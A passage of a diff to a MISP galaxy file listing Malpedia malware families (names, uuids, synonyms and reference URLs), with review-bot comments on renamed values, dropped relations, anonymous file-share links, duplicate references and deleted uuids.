 "value": "SeaSalt"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sectop_rat",
+ "https://www.gdatasoftware.com/blog/2019/11/35548-new-sectoprat-remote-access-malware-utilizes-second-desktop-to-control-browsers",
+ "https://vxhive.blogspot.com/2021/01/deep-dive-into-sectoprat.html"
+ ],
+ "synonyms": [
+ "1xxbot",
+ "ArechClient"
+ ],
+ "type": []
+ },
+ "uuid": "a7e3b468-399c-419c-87d5-4efcea8ec0cc",
+ "value": "SectopRAT"
+ },
 {
 "description": "",
 "meta": {
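Review bot: The first hunk changes `"value": "SeaDaddy"` to `"value": "SEADADDY"` on the unchanged uuid 1d07212e-…, and because the MISP galaxy tag name is built from the value, events already tagged with the old spelling will stop resolving to this cluster even though the uuid is stable. Either keep `"value": "SeaDaddy"` and add `"SEADADDY"` to its `synonyms`, or say in the commit description that this rename needs a re-tag on existing instances. The diff alignment also makes it look as if the SeaDaddy refs were replaced by the SDBbot refs; that is only how the new SDBbot object was interleaved, and the re-added SeaDaddy object does keep the contagiodump and crowdstrike references, so nothing is lost there.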
@@ -15160,7 +27725,8 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll",
 "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
 "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets",
- "https://www.recordedfuture.com/chinese-threat-actor-tempperiscope/"
+ "https://www.recordedfuture.com/chinese-threat-actor-tempperiscope/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk"
 ],
 "synonyms": [],
 "type": []
@@ -15173,11 +27739,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
+ "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf",
 "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware_15.html",
 "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
- "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html"
+ "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight",
+ "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/"
 ],
 "synonyms": [
 "azzy",
@@ -15193,12 +27762,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader",
- "https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/",
- "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html",
 "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/",
+ "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
+ "https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/",
+ "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html",
+ "https://www.emanueledelucia.net/apt28-sofacy-seduploader-under-the-christmas-tree/",
 "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf",
 "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html",
+ "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf",
 "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight",
 "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/",
 "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/",
 "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/",
@@ -15220,7 +27794,38 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seinup",
+ "https://www.fireeye.com/blog/threat-research/2013/06/trojan-apt-seinup-hitting-asean.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "9789dfe8-d156-4f19-8177-25718dd14f1f",
+ "value": "seinup"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sekhmet",
+ "https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html",
+ "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b4b4e8c8-fc66-4618-ba35-75f21d7d6922",
+ "value": "Sekhmet Ransomware"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe",
+ "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
+ "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618"
 ],
 "synonyms": [],
 "type": []
@@ -15228,6 +27833,35 @@
 "uuid": "503ca41c-7788-477c-869b-ac530f20c490",
 "value": "SendSafe"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepsys",
+ "https://id-ransomware.blogspot.com/2020/02/sepsys-ransomware.html"
+ ],
+ "synonyms": [
+ "Silvertor Ransomware"
+ ],
+ "type": []
+ },
+ "uuid": "08f37434-4aba-439f-afae-fed61f411ac4",
+ "value": "SepSys Ransomware"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher",
+ "https://www.proofpoint.com/us/blog/threat-insight/chinese-apt-ta413-resumes-targeting-tibet-following-covid-19-themed-economic",
+ "https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6025475a-b89d-401d-882d-50fe1b03154f",
+ "value": "Sepulcher"
+ },
 {
 "description": "",
 "meta": {
@@ -15245,11 +27879,24 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.servhelper",
- "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
+ "https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners",
+ "https://insights.oem.avira.com/ta505-apt-group-targets-americas/",
+ "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
 "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf",
- "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
 "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/",
- "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware"
+ "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware",
+ "https://www.binarydefense.com/an-updated-servhelper-tunnel-variant/",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/",
+ "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/",
+ "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/",
+ "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -15262,13 +27909,25 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer",
- "https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/",
 "https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/",
- "https://securelist.com/operation-shadowhammer/89992/",
+ "https://mauronz.github.io/shadowhammer-backdoor",
+ "https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://blog.f-secure.com/a-hammer-lurking-in-the-shadows/",
+ "https://www.youtube.com/watch?v=T5wPwvLrBYU",
+ "https://labsblog.f-secure.com/2019/03/29/a-hammer-lurking-in-the-shadows",
+ "https://norfolkinfosec.com/possible-shadowhammer-targeting-low-confidence/",
+ "https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/",
+ "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf",
+ "https://norfolkinfosec.com/the-first-stage-of-shadowhammer/",
 "https://blog.reversinglabs.com/blog/forging-the-shadowhammer",
- "https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html"
+ "https://securelist.com/operation-shadowhammer/89992/",
+ "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/"
+ ],
+ "synonyms": [
+ "DAYJOB"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "51728278-a95c-45a5-9ae0-9897d41d0efb",
@@ -15280,10 +27939,26 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad",
 "https://securelist.com/shadowpad-in-corporate-networks/81432/",
+ "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/",
+ "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
 "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf",
- "http://www.dailysecu.com/?mod=bbs&act=download&bbs_id=bbs_10&upload_idxno=4070"
+ "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
+ "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
+ "https://www.youtube.com/watch?v=55kaaMGBARM",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
+ "https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/"
 ],
 "synonyms": [
+ "POISONPLUG.SHADOW",
 "XShellGhost"
 ],
 "type": []
@@ -15349,6 +28024,32 @@
 "uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43",
 "value": "SHARPKNOT"
 },
+ {
+ "description": "The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of the main activity class called \u201cStage_One\u201d. SharpStage can take screenshots, run arbitrary commands and downloads additional payloads. It exfiltrates data from the infected machine to a dropbox account by implementing a dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the middle east. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstage",
+ "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "11788d9b-485b-4049-ba5e-1b06d526361e",
+ "value": "SharpStage"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstats",
+ "https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "819fd946-ed0e-4cec-ad45-66b88e39b732",
+ "value": "SHARPSTATS"
+ },
 {
 "description": "",
 "meta": {
@@ -15363,11 +28064,15 @@
 "value": "ShellLocker"
 },
 {
- "description": "",
+ "description": "Shifu was originally discovered by Trusteer security researchers (Ilya Kolmanovich, Denis Laskov) in the middle of 2015. It is a banking trojan mostly focusing on Japanese banks and has rich features for remote data extraction and control.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu",
- "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/"
+ "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/",
+ "https://www.virusbulletin.com/virusbulletin/2015/11/shifu-rise-self-destructive-banking-trojan",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/"
 ],
 "synonyms": [],
 "type": []
@@ -15380,7 +28085,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat",
- "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf"
+ "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-walker"
 ],
 "synonyms": [],
 "type": []
@@ -15406,7 +28112,6 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin",
- "http://www.nyxbone.com/malware/chineseRansom.html",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/"
 ],
 "synonyms": [],
@@ -15436,6 +28141,7 @@
 "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/",
 "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html",
 "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/",
+ "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware",
 "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/",
 "https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware",
 "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw"
@@ -15453,21 +28159,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder",
+ "https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html",
+ "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf",
+ "https://ti.qianxin.com/blog/articles/the-recent-rattlesnake-apt-organized-attacks-on-neighboring-countries-and-regions/",
+ "https://www.secrss.com/articles/26507",
+ "https://s.tencent.com/research/report/659.html",
 "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c",
 "https://s.tencent.com/research/report/479.html"
 ],
 "synonyms": [],
 "type": []
 },
- "related": [
- {
- "dest-uuid": "c4ce1174-9462-47e9-8038-794f40a184b3",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
- }
- ],
 "uuid": "3c43bd4c-8c40-47b5-ae97-3dd0f0c0e8d8",
 "value": "SideWinder"
 },
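Review bot: The SideWinder hunk drops the entire `"related"` array (the `"type": "similar"` link to dest-uuid c4ce1174-… with its estimative-language tag) and the commit description, which only says "update to latest", does not mention that relations are being removed. Given that the rest of this commit is a refresh from the Malpedia MISP export, this reads like a field the export does not carry rather than a deliberate decision, and the cross-cluster link will silently vanish from any galaxy relationship view that used it. Either re-add the block after regeneration, or state in the commit description that `related` entries are not preserved by the refresh so the loss is recorded.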
@@ -15476,8 +28178,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras",
+ "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks",
+ "https://www.secureworks.com/research/threat-profiles/nickel-academy",
 "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
- "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/"
+ "https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.us-cert.gov/ncas/alerts/TA14-353A",
+ "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware"
 ],
 "synonyms": [
 "Destover"
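Review bot: The new Sierras reference `https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4` is an anonymous file-share link that carries no author, title or publisher, so analysts cannot attribute or verify what it points to and it will rot as soon as the share is withdrawn. Prefer the publisher's own page or a web.archive.org snapshot, as the same hunk already does for the Symantec SWIFT post. Since the file is generated from the Malpedia API, that correction belongs upstream or it will be reintroduced on the next regeneration.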
@@ -15499,15 +28206,36 @@ "uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8", "value": "Siggen6" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sihost", + "https://threatrecon.nshc.net/2019/12/03/threat-actor-targeting-hong-kong-activists/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c1b6e597-17e6-4485-819e-5aa03904bc61", + "value": "sihost" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", + "https://norfolkinfosec.com/how-the-silence-downloader-has-evolved-over-time/", + "https://github.com/Tera0017/TAFOF-Unpacker", "http://www.intezer.com/silenceofthemoles/", "https://www.group-ib.com/resources/threat-research/silence.html", + "https://reaqta.com/2019/01/silence-group-targeting-russian-banks/", + "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", "https://securelist.com/the-silence/83009/", - "https://reaqta.com/2019/01/silence-group-targeting-russian-banks/" + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-004.pdf", + "https://norfolkinfosec.com/some-notes-on-the-silence-proxy/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672" ], "synonyms": [ "TrueBot" 
@@ -15548,7 +28276,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda",
- "https://secrary.com/ReversingMalware/iBank/"
+ "https://www.youtube.com/watch?v=u2HEGDzd8KM",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/simda-a-botnet-takedown/",
+ "https://secrary.com/ReversingMalware/iBank/",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/"
 ],
 "synonyms": [
 "iBank"
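Review bot: The two McAfee references added to Simda are the same article (`.../evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/`) served from two hostnames, securingtomorrow.mcafee.com and www.mcafee.com, so one of them is redundant and the older host is the one likely to stop resolving. Keep only the currently served URL. The sorgu hunk further down repeats the pattern with the Leafminer post under both www.symantec.com and symantec-blogs.broadcom.com; a host-normalising de-duplication step in the generator would catch both.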
@@ -15558,14 +28290,31 @@ "uuid": "467ee29c-317f-481a-a77c-69961eb88c4d", "value": "Simda" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.simplefilemover", + "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b56173a1-84e3-4551-ac4a-9e71e65dc9e5", + "value": "SimpleFileMover" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", - "https://en.wikipedia.org/wiki/Torpig", - "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", + "https://www.recordedfuture.com/turla-apt-infrastructure/", "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan", + "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://en.wikipedia.org/wiki/Torpig", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/" ], "synonyms": [ @@ -15586,6 +28335,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4" ], "synonyms": [], 
@@ -15598,14 +28348,50 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.skarab_ransom", - "http://malware-traffic-analysis.net/2017/11/23/index.html" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.skimer", + "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", + "http://atm.cybercrime-tracker.net/index.php", + "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" ], "synonyms": [], "type": [] }, - "uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694", - "value": "Skarab Ransom" + "uuid": "6d5e558a-e640-49c3-87b9-2c102c334b1b", + "value": "Skimer" + }, + { + "description": "A Microsoft SQL Server backdoor", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.skip20", + "https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6a59a639-8070-4c5f-86be-8a2a081cf487", + "value": "skip-2.0" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.skipper", + "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf", + "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender-Whitepaper-PAC-A4-en_EN1.pdf", + "https://www.secureworks.com/research/threat-profiles/iron-hunter", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://blog.telsy.com/following-the-turlas-skipper-over-the-ocean-of-cyber-operations/", + 
"https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fac6313b-8068-429c-93ae-21e8072cf667", + "value": "Skipper" }, { "description": "", @@ -15632,6 +28418,20 @@ "uuid": "1f4d8d42-8f31-47f8-b2b7-2d43196de532", "value": "Slave" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.slickshoes", + "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", + "https://www.us-cert.gov/ncas/analysis-reports/ar20-045b" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a82f80fc-71e8-4dee-8a64-e5cbb4100321", + "value": "SLICKSHOES" + }, { "description": "- 2012 first sighted\r\n- Attack vector via compromised Microtik routers where victim's got infection when they connect to Microtik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer", "meta": { 
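Review bot: The Skarab Ransom entry (uuid c1ccba65-e2f0-4f29-8e04-6b119c7f8694) is deleted outright and its slot reused for Skimer under a new uuid, so any MISP event or correlation already tagged with the old uuid is left pointing at nothing once this cluster is imported. The cluster carries no tombstone or forwarding entry for it; consider retaining the old element (its refs and a description noting that Malpedia no longer tracks it) or at least listing dropped uuids in the commit description so downstream instances can migrate tags. The same silent drop happens to uuid 1628467f-cad5-453c-a5da-a4f543747d58 (`win.spynet_rat`) in the SpyEye hunk below. This hunk also spans the Skimer, skip-2.0 and Skipper entries, which raise no further issue.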
@@ -15647,12 +28447,45 @@ "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846", "value": "Slingshot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver", + "https://github.com/BishopFox/sliver" + ], + "synonyms": [], + "type": [] + }, + "uuid": "654c478e-3c9a-4fd9-a9b7-dd6839f51147", + "value": "Sliver" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.slothfulmedia", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a", + "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/" + ], + "synonyms": [ + "QueenOfClubs" + ], + "type": [] + }, + "uuid": "f23d70bc-7de6-49bd-bb69-82518b4d7fca", + "value": "SlothfulMedia" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slub", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/" + "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-kitsune.pdf", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf", + "https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/", + "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html" ], "synonyms": [], "type": [] 
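Review bot: The new Sliver entry has an empty description although its only reference is the BishopFox GitHub repository, so consumers matching this cluster cannot tell that it is a publicly available command-and-control framework rather than a single actor's malware. A one-line description such as `"description": "Sliver is an open-source, cross-platform command-and-control framework published by Bishop Fox for adversary emulation; a match on this cluster may stem from authorized red-team activity as well as from malicious use."` would help analysts triage hits. Because the file is regenerated from the Malpedia API, the wording should be contributed upstream rather than patched here.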
@@ -15665,7 +28498,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf"
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf",
